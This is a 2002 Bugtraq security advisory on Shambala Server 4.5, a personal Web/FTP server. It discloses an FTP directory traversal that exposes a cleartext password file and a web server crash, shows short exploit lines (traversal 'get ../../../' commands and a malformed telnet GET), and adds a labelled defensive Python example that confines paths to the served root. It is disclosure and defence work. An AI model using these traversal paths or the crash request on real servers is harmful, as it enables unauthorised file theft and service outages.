[[ TH 026 Inc. ]] SA #3 - Shambala Server 4.5, Directory Traversal and DoS

From: Daniel Nyström (exce@netwinder.nu)
Date: 05/31/02


Date: Fri, 31 May 2002 00:21:30 +0200
From: Daniel Nyström <exce@netwinder.nu>
To: bugtraq@securityfocus.com


  Telhack 026 Inc. Security Advisory - #3
_________________________________________

Name: Shambala Server 4.5
Impact: Major (FTP Server vuln.), Medium (Web Server vuln.)
Date: June 30 / 2002
_________________________________________

Daniel Nyström a.k.a. excE <exce@netwinder.nu>

_I N F O_

Shambala Server is a personal Web/FTP server for Win 9*/NT.
When the web server is started it also starts the integrated
FTP server. There are two previous issues that were
disclosed on Bugtraq by zillion in 2000, but he seems to have
missed these things.

Both of them: http://online.securityfocus.com/archive/1/138501

Vendor is at: http://www.evolvable.com , and yes, they were notified,
see bottom.

_P R O B L E M_

The integrated FTP server is vulnerable to a directory traversal
attack that enables attackers to view the entire directory
structure and also download any file in it. There is also a
DoS condition present in the web server.

_I M P A C T_

An authenticated user may view any directory and/or download
any file on the system. An authenticated user may use this
to download the !_cleartext_! password file that lies one ..
below the web root.

I have also found a DoS condition in the Web server that
generates "Run-time error'5': Invalid procedure call or argument"
and crashes the server.

According to www.download.com, the program has been downloaded
57,957 times and 40 times last week. So it seems like this program
is still in use.

_E X P L O I T I N G_

Directory traversal / get any file
----------------------------------
ftp> ls ../../../ - and so on...
ftp> get ../../../ - and so on...

DoS condition in the Web server
-------------------------------
you# telnet 192.168.0.11 80
Trying 192.168.0.11...
Connected to 192.168.0.11.
Escape character is '^]'.
GET !"#¤%&/()=?
Connection closed by foreign host.
you#

_F I X E S_

Spent almost 20 minutes digging in the evolvable.com website for
an e-mail address to contact them by, but none found. So I ended
up taking the e-mail address from another (2 year old) advisory.
Still no reply. So the fix for now is: Uninstall Shambala.

/Daniel Nyström a.k.a. excE @ Telhack 026 Inc.

http://www.swesec.tk
http://www.telhack.tk
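
Added example, not part of the original advisory and not Shambala's code: one way an FTP server can confine LIST/RETR arguments such as the `../../../` paths shown above to its served root. The function name, exception class, directory layout and file names are constructed for illustration.

```python
import os
import tempfile

class PathEscapesRoot(Exception):
    """Client-supplied path resolves outside the FTP root."""

def resolve_ftp_path(root, cwd, arg):
    """Map a LIST/RETR argument to a real path inside root, or raise."""
    # Windows servers accept both separators; normalise before checking.
    arg = arg.replace("\\", "/")
    if "\x00" in arg:
        raise PathEscapesRoot("NUL byte in path")
    # Absolute arguments are relative to the virtual root, not the disk.
    virtual = arg if arg.startswith("/") else cwd.rstrip("/") + "/" + arg
    root_real = os.path.realpath(root)
    # realpath collapses ".." and follows symlinks, so the containment
    # check runs on the location the OS would actually open.
    candidate = os.path.realpath(os.path.join(root_real, virtual.lstrip("/")))
    try:
        inside = os.path.commonpath([root_real, candidate]) == root_real
    except ValueError:  # e.g. a different drive letter on Windows
        inside = False
    if not inside:
        raise PathEscapesRoot(arg)
    return candidate

def demo():
    """Constructed layout: a password file one level above the served root."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "wwwroot")
    os.makedirs(os.path.join(root, "pub"))
    open(os.path.join(base, "passwords.txt"), "w").close()
    open(os.path.join(root, "pub", "readme.txt"), "w").close()
    results = {}
    for arg in ["readme.txt", "../pub/readme.txt", "../../passwords.txt",
                "..\\..\\passwords.txt", "/../passwords.txt"]:
        try:
            resolve_ftp_path(root, "/pub", arg)
            results[arg] = "allowed"
        except PathEscapesRoot:
            results[arg] = "rejected"
    return results

if __name__ == "__main__":
    for arg, verdict in demo().items():
        print(f"{verdict:8}  {arg}")
```

The check is made on the resolved path rather than by searching the argument for `..`, so a harmless `../pub/readme.txt` stays allowed while every form that leaves the root is refused.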


